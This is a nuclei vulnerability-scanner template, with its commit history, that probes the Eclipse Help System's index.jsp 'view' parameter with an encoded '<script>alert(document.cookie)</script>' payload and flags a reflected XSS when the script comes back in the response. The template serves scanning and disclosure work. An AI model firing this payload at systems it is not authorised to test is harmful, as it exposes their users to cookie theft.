nuclei-templates/vulnerabilities/eclipse-help-system-xss.yaml

id: eclipse-help-system-xss

info:
  name: Eclipse Help System RXSS vulnerability
  author: pikpikcu
  severity: medium

  # Source:- https://github.com/pikpikcu/nuclei-templates/blob/master/vulnerabilities/eclipse-xss.yaml

requests:
  - method: GET
    path:
      - "{{BaseURL}}/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "<script>alert(document.cookie)</script>"
        part: body
Create eclipse-help-system-xss.yaml 2020-08-30 05:05:28 +00:00			`id: eclipse-help-system-xss`

			`info:`
			`name: Eclipse Help System RXSS vulnerability`
			`author: pikpikcu`
			`severity: medium`

Update eclipse-help-system-xss.yaml 2020-08-30 05:08:28 +00:00			`# Source:- https://github.com/pikpikcu/nuclei-templates/blob/master/vulnerabilities/eclipse-xss.yaml`

Create eclipse-help-system-xss.yaml 2020-08-30 05:05:28 +00:00			`requests:`
			`- method: GET`
			`path:`
False positive on XSS templates Encode XSS payload to prevent false positives when the Query string is returned AS IS by the server. Recent browsers will always send the parameters encoded. 2020-09-03 15:56:31 +00:00			`- "{{BaseURL}}/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E"`
Create eclipse-help-system-xss.yaml 2020-08-30 05:05:28 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
			`- type: word`
			`words:`
			`- "<script>alert(document.cookie)</script>"`
			`part: body`